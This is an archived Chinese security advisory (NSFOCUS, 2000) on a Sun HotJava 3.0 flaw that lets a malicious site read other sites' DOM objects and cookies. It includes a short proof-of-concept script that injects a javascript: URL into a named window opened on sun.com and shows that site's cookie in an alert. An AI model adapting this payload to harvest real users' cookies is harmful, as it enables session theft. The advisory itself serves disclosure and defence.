安全研究
安全漏洞
Sun HotJava 浏览器存取任意DOM对象的漏洞
发布日期:2000-10-27
更新日期:2000-10-27
受影响系统:
Sun HotJava Browser 3.0
- Sun Solaris 2.6
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- Apple MacOS 8.0
描述:
恶意的网站管理员可能在目标系统中的用户使用Sun HotJava浏览器浏览其网站
时获得目标系统中的cookie。
如果从一个命名窗口中启动一段特殊构造的javascript脚本,就可以存取包含任
意URL的DOM对象(Document Object Model,简称DOM)。通过这种方法可以获
得包含敏感信息的cookie。
<* 来源:Georgi Guninski (
guninski@guninski.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Georgi Guninski <
guninski@guninski.com>建立了如下演示页面:
http://www.guninski.com/hotjava-1.html
相关代码如下:
<SCRIPT>
window.open("http://www.sun.com","g");
setTimeout("window.open('javascript:alert(\"The first link is: \"+document.links[0].href);alert(\"The cookie is: \"+document.cookie)','g')",10000);
</SCRIPT>
建议:
临时解决办法:
NSFOCUS建议您禁止javascript。
厂商补丁:
Sun已经不再支持HotJava浏览器
浏览次数:7389
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |